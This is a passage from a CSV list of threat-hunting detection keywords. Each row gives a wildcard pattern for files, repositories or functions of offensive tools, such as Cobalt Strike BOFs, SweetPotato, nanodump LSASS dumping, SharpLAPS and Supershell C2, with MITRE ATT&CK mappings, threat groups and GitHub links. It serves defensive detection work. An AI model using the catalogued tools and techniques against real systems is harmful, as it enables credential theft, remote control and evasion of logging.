T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*supershell*winpty.dll*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*supershell*winpty-agent.exe*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*SupportScam:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*surajpkhetani/AutoSmuggle*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*suspended_run *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*suspendresume.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*suspendresume.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z 
-*svc_stager.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SW2_GetSyscallNumber*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_GetSyscallNumber*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW2_HashSyscall*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_PopulateSyscallList*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_PopulateSyscallList*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW2_RVA2VA*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_RVA2VA*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW3_GetSyscallAddress*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*swaks --to * --from * --header *Subject: * --body * --server *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SwampThing.exe*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*SwampThing.exe*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SwampThing.pdb*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SwampThing.sln*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SWbemServicesImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*sweetpotato -p*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SweetPotato.cna*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.csproj*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.exe*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SweetPotato.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SweetPotato.ImpersonationToken*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.sln*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 
TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*sweetsoftware/Ares*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*swisskyrepo/SharpLAPS*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*swisskyrepo/SSRFmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SwitchPriv.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*SxNade/Rudrastra*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*synacktiv/GPOddity*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z 
-*synacktiv/ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*synacktiv_gpoddity*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*sync-starkiller*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - 